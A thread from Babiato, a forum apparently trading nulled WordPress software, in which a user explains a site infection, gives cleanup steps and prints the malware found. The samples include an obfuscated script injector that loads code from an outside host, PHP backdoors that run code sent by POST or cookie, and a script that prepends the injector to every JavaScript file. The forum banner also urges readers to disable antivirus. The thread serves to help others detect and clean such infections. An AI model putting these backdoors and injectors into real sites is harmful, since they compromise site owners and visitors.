• You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

    Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

Wordpress Hack [Replicating Malware with redirection + not so easy fix]

nesym

Well-known member
Babiato Lover
Trusted Seller
Trusted Uploader
Sep 8, 2019
440
286
63
Why do I post that?

Educational purpose. If anyone stumbles upon something similar to know how to deal with it in the best way possible.

Why did I get malware/hacked in the first place?

No one to blame but yourself. You decide what you are going to put on your web server and only you have the power to do so. Most likely poor hardening, configuration, outdated plugins/software, or malicious file uploaded directly by you.

Another good answer to this is:
Because hackers want to achieve something. From SEO to phishing/scam/steal data/just do harm/for fun because they can.

Ok, so many of you have been here. One of my projects just got defaced. That's the risk of using Wordpress and using nulled themes and plugins. To be honest I normally scan the files before I upload them to the server but lately I was just too bold because I wasn't finding anything suspicious since I'm using only Babiato and uploaded them straight to the server. Even though Babiato has it's good reputation and members here always helped each other (also helped me many times) there is always the option that one out of 1000 uploaders decides to put something funny in his uploads.

How to clean the hack?

1. Backup the hacked web server as is (with the malware)
2. Backup the DB files
3. Create a virtual machine
4. Sync the server to the virtual machine
5. Nuke the god damn server with the ground
6. Forbid it's access to the WWW and scan the virtual machine using tools like clamAV, aibolit, wordfence and
7. Clean all the folders and files manually by removing them and removing strings in the code
8. Clean the database manually
9. Set the new server from the ground up
10. Hardening the server
11. Change all your db names and passwords
12. Make an rsync backup every week and keep it somewhere on your PC

What exactly is that malware doing?

It has a php/js file that executes the malware. Normaly it's not a rootkit but just a normal malware that spreads across all folders that have www-data user access in the main public_html folder.

In my case, I think what installs the functions of the malware was masked as an .ico
then it shits all over your .JavaScript and .PHP also .JSON and tries to replicate a malicious code.

Here is an example of how it looks.

Redirection to:

The part that you have to GREP in JS/PHP:

Code:
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

Decoded it looks like this:

JavaScript:
    Element.prototype.appendAfter = function(element) {
    element.parentNode.insertBefore(this, element.nextSibling);
}
, false;
    (function() {
     var elem = document.createElement(script);
     elem.type = text/javascript elem.src = https://store.dontkinhooot.tw/stat.jselem.appendAfter(document.getElementsByTagName(script)[0]);
    elem.appendAfter(document.getElementsByTagName(head)[0]);
    document.getElementsByTagName(head)[0].appendChild(elem);
}
)();
    Element.prototype.appendAfter = function(element) {
    element.parentNode.insertBefore(this, element.nextSibling);
}
, false;
    (function() {
     var elem = document.createElement(script);
     elem.type = text/javascript elem.src = https://store.dontkinhooot.tw/stat.jselem.appendAfter(document.getElementsByTagName(script)[0]);
    elem.appendAfter(document.getElementsByTagName(head)[0]);
    document.getElementsByTagName(head)[0].appendChild(elem);
}
)();
var isIE=!1,isEdge=!1;

Check your Wordpress for files like wp-stream.php, wp-xmlrpc.php (there shouldn't be no wp-xmlrpc but only xmlrpc.php in the default wp install)

wp-stream.php content

PHP:
<?php  if(isset($_POST['lt']) && md5($_POST['lt']) == base64_decode("MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=") ) {$lt = base64_decode($_POST['a']);file_put_contents('lte_','<?php '.$lt);$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);}} ?>

Decoded it looks like this:

PHP:
if(isset($_POST['lt']) && md5($_POST['lt']) == 023258bbeb7ce955a690dca056be885d ) {$lt = ;file_put_contents('lte_',''.$lt);$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);}}

I also noticed this not long ago, they may be connected:
(This you can find in your home page when looking at the view page source)


HTML:
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">

<a style="font-size:18px;" href="https://downapkmod.com/" title="https://downapkmod.com/">https://downapkmod.com/</a>,

<a style="font-size:18px;" href="https://apkcop.com/" title="https://apkcop.com/">https://apkcop.com/</a>

</div>

lte_ content
Code:
<?php ini_set('max_execution_time', '300');
ini_set('memory_limit', '-1');

$files = array();
$b = "/../../../../../../../../";
$l = "/";
 $it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT']);
  $display = Array ( 'php' );
        $search = Array('.js');
        $files_ar = array();

        foreach(new RecursiveIteratorIterator($it) as $file)
        {
             if (strpos($file->getFilename(),'.js') == true || strpos($file->getFilename(),'.js') == true)
                {
            
                    $q = strposa($file->getFilename(), $search);
                    if($q != ""){
                        array_push($files,$file->getPathname());
                    }
                

            }
        }
        foreach($files as $onefile) {
    
    make_work($onefile);
    
}


for ($i = 1; $i < 8; $i++) {
    $l .= "../";
try {
  $it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT'].$l);
  $display = Array ( 'php' );
        $search = Array('.js');
        $files_ar = array();

        foreach(new RecursiveIteratorIterator($it) as $file)
        {
             if (strpos($file->getFilename(),'.js') == true || strpos($file->getFilename(),'.js') == true)
                {
            
                    $q = strposa($file->getFilename(), $search);
                    if($q != ""){
                        array_push($files,$file->getPathname());
                    }
                

            }
        }
        foreach($files as $onefile) {
    
    make_work($onefile);
    
}
} catch (Exception $e) {
  
}

}

function strposa($haystack, $needle, $offset=0) {
        if(!is_array($needle)) $needle = array($needle);
        $stroke = "";
        foreach($needle as $query) {
            if(strpos($haystack, $query, $offset) !== false) { $stroke .= $query."|";}
        }
        return $stroke;
    }

function make_work($f){
                $g = file_get_contents($f);
            
                                        

if (strpos($g, '102,111,114,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119') !== false) {

} else {

$l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";
$g = file_get_contents($f);
$g = $l2.$g;
@system('chmod 777 '.$f);
@file_put_contents($f,$g);
echo $f."<br />";
}

    
}

randomstring.php

Code:
<?php
$vrtna = '90b_xpdt*l63k8#yancofsrgmuvH72451\'ei-';$umcear = Array();$umcear[] = $vrtna[27].$vrtna[8];$umcear[] = $vrtna[18].$vrtna[22].$vrtna[34].$vrtna[16].$vrtna[7].$vrtna[34].$vrtna[3].$vrtna[20].$vrtna[25].$vrtna[17].$vrtna[18].$vrtna[7].$vrtna[35].$vrtna[19].$vrtna[17];$umcear[] = $vrtna[29].$vrtna[10].$vrtna[18].$vrtna[32].$vrtna[10].$vrtna[31].$vrtna[2].$vrtna[34].$vrtna[36].$vrtna[1].$vrtna[10].$vrtna[31].$vrtna[18].$vrtna[36].$vrtna[30].$vrtna[31].$vrtna[11].$vrtna[29].$vrtna[36].$vrtna[13].$vrtna[13].$vrtna[18].$vrtna[30].$vrtna[36].$vrtna[30].$vrtna[0].$vrtna[11].$vrtna[30].$vrtna[1].$vrtna[29].$vrtna[20].$vrtna[29].$vrtna[29].$vrtna[13].$vrtna[28].$vrtna[10];$umcear[] = $vrtna[14];$umcear[] = $vrtna[18].$vrtna[19].$vrtna[25].$vrtna[17].$vrtna[7];$umcear[] = $vrtna[21].$vrtna[7].$vrtna[22].$vrtna[3].$vrtna[22].$vrtna[34].$vrtna[5].$vrtna[34].$vrtna[16].$vrtna[7];$umcear[] = $vrtna[34].$vrtna[4].$vrtna[5].$vrtna[9].$vrtna[19].$vrtna[6].$vrtna[34];$umcear[] = $vrtna[21].$vrtna[25].$vrtna[2].$vrtna[21].$vrtna[7].$vrtna[22];$umcear[] = $vrtna[16].$vrtna[22].$vrtna[22].$vrtna[16].$vrtna[15].$vrtna[3].$vrtna[24].$vrtna[34].$vrtna[22].$vrtna[23].$vrtna[34];$umcear[] = $vrtna[21].$vrtna[7].$vrtna[22].$vrtna[9].$vrtna[34].$vrtna[17];$umcear[] = $vrtna[5].$vrtna[16].$vrtna[18].$vrtna[12];foreach ($umcear[8]($_COOKIE, $_POST) as $mcysgb => $slevav){function ytmnrg($umcear, $mcysgb, $cbodj){return $umcear[7]($umcear[5]($mcysgb . $umcear[2], ($cbodj / $umcear[9]($mcysgb)) + 1), 0, $cbodj);}function etbln($umcear, $uvrzj){return @$umcear[10]($umcear[0], $uvrzj);}function jvjpux($umcear, $uvrzj){$mltsule = $umcear[4]($uvrzj) % 3;if (!$mltsule) {$kbjfl = $umcear[1]; $wtmzk = $kbjfl("", $uvrzj[1]($uvrzj[2]));$wtmzk();exit();}}$slevav = etbln($umcear, $slevav);jvjpux($umcear, $umcear[6]($umcear[3], $slevav ^ ytmnrg($umcear, $mcysgb, $umcear[9]($slevav))));}


To the so called hackers:

Annoying I admit... you now force me to use docker for every single website installation and find other ways to protect myself.

To the people that got hacked:

Try to share what you got, how you think you got it, but don't insist and blame someone if you don't have the evidence. Sharing helps others protect against similar attacks and figuring out how they got hacked in the first place.

PS: I found the core of the code before it deleted itself (have my ways) but I am not publishing it because it can be used the other way around.

test edit because I have some error when editting
 
Last edited:
Thank you for this nice detailed guide. I was nerveous to read the title earlier.
 
The infected files downloaded from Babiato?
Please share here more info about it so the admins can cure or ban or....
 
The infected files downloaded from Babiato?
Please share here more info about it so the admins can cure or ban or....
Possibly The Plus Addons for Elementor hack from the other day maybe?
 
How to clean the hack?

1. Backup the hacked web server as is (with the malware)
2. Backup the DB files
3. Create a virtual machine
4. Sync the server to the virtual machine
5. Nuke the god damn server with the ground
6. Forbid it's access to the WWW and scan the virtual machine using tools like clamAV, aibolit, wordfence and
7. Clean all the folders and files manually by removing them and removing strings in the code
8. Clean the database manually
9. Set the new server from the ground up
10. Hardening the server
11. Change all your db names and passwords
12. Make an rsync backup every week and keep it somewhere on your PC
This is a complete guide but not everyone can do it. The would be nice if anyone shared their documents
 
I think if your host has Imunify 360 installed in cpanel, it nullifies and removes malwares. Works for me.
 
Informative post and a really good article to read peacefully. Sometimes, a good hosting can play the role itself by kicking the malwares automatically through its scan.
 
  • Like
Reactions: Saint Gabriel
Ok, so many of you have been here. One of my projects just got defaced. That's the risk of using Wordpress and using nulled themes and plugins.
I'm using only Babiato and uploaded them straight to the server. Even though Babiato has it's good reputation and members here always helped each other (also helped me many times) there is always the option that one out of 1000 uploaders decides to put something funny in his uploads.

For these 2 statements allow me to disagree. Couple days ago found this specific injection on 3 different servers.
All of them had legit themes and plugins not even one nulled. Can you explain it before pointing fingers?
 
No bro, he is talking about nulled plugins and themes !
Maybe, maybe not.

But my point is more that even only using legit purchased licenced plugins/themes and running security such as wordfence doesn't leave you immune from attack as the events of this week have proven.
 
Maybe, maybe not.

But my point is more that even only using legit purchased licenced plugins/themes and running security such as wordfence doesn't leave you immune from attack as the events of this week have proven.

This. Not just nulled plugins got malware - others simply don't get security updates or have a non-disclousured security bug, even official ones... WordPress has this downside, but I think that with good monitoring (wordfence for modified files for example), or as stated in the post, using docker containers or individual Cpanel accounts will make this hard to spread between your websites :)
 
  • Like
Reactions: Medw1311
Maybe, maybe not.
But my point is more that even only using legit purchased licenced plugins/themes and running security such as wordfence doesn't leave you immune from attack as the events of this week have proven.

Totally agree with you and like @slvrsteele post above yours, that's what i really want to say to the Op.
 
  • Like
Reactions: Medw1311
For these 2 statements allow me to disagree. Couple days ago found this specific injection on 3 different servers.
All of them had legit themes and plugins not even one nulled. Can you explain it before pointing fingers?

Try not taking it personal, please. I am not trying to attack anyone. Actually I'm thankful for everything I got out of the Babiato forum and I myself love to contribute as much as I can. If you read my post carefully enough you'll see I'm not pointing fingers. People describe me as a very rational and logical person and I tend to agree. My only motive here is to arouse attention, see if other members have similar problems. Start a discussion, hopefully a one that will be beneficial for everyone. With all the respect to those people who share resources, their time and dedication. I very well understand the risks and that your server can be compromised from the outside even though that's very unlikely when you take the right measures.
 
Possibly The Plus Addons for Elementor hack from the other day maybe?

That's possible but I believe not. I only had that plugin on a single website and changed strings and names so no one would actually suspect it's that exact plugin. I even have a custom version of Elementor and others so I doubt an automated attack would happen. Also most of the countries outside of my region are banned from accessing sensitive content. You have to know how I changed those plugin strings in order to make use of the attack. For example if someone was looking for "Elementor" he wouldn't find a single line of code in my code containing that string. It goes the same for every other plugin. It costs me extra efforts but helps me improve security. Also anyone please don't ask for a tutorial on this just take it as is.
 
I wasn't taking it personal, don't get me wrong. But everyone always blames the nulled things. They might be right probably 50% of the time. But no one thinks of lazy or rookie developers that tries to get on front for a buck or two or of those complicated scripts that displays a simply date and hour during 50 files of php code.
Making mistakes as a developer is human and some learns from their mistakes and improve while others just don't care and keep going. Some just thinks that aligning 3 lines of codes makes them developers without any knowledge of coding safety practice or code security.

But every single end user out there is blaming the nulled versions of those scripts and it's not fair.
 
  • Like
Reactions: imtiyazali4410
Deleted? why?
Brothers, i am not attacking anyone on here ! I was just curious about which files get infected that's all.
Passion for technology led this 50 years old men to be an expert in many IT fields :cool:
 
It was too big and too direct. Sorry for that.

If you wanna see the patterns of an attack then check the file timestamp for last modified and sync with error and access log for that period of time. On one of servers I was talking about the attacker tried for hours to find a flaw and found a way to use the update option of wp-admin.
185.212.129.205 - - [10/Mar/2021:11:58:28 +0100] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 561878

Most used attack is by scanning the users trough xmlrpc using the [login] request and try to bruteforce the login.
Another most common attack was using revslider exploit (didn't try lately so I don't know if it still works but I still see scans for revslider on server logs)
There are many plugins/themes/scripts with well known flaws and 0-day critical flaws and that's why I always say to check your used plugins/themes against vulnerability database.
 
  • Like
Reactions: Babak and Mscv50
That's possible but I believe not. I only had that plugin on a single website and changed strings and names so no one would actually suspect it's that exact plugin. I even have a custom version of Elementor and others so I doubt an automated attack would happen. Also most of the countries outside of my region are banned from accessing sensitive content. You have to know how I changed those plugin strings in order to make use of the attack. For example if someone was looking for "Elementor" he wouldn't find a single line of code in my code containing that string. It goes the same for every other plugin. It costs me extra efforts but helps me improve security. Also anyone please don't ask for a tutorial on this just take it as is.
How did you hide that string? Are you manualy change the plugin code or something else?.
 
I had a similar case where an additional .htaccess file was copied into each folder. In the public directory were a lot of changed and new files. It took a bit of time, but now the site is running normally again. To remove all the .htaccess files I ran a shell script. This saved a lot of work. The rest I had to clean manually.

The problem is that I haven't figured out where the malware came from. Especially because I hadn't changed or updated anything on the site for a few months.
 
based on my experience

1st if download from nulled web, i run local in my sandbox, after check and clean, i push to server or host.
 
AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock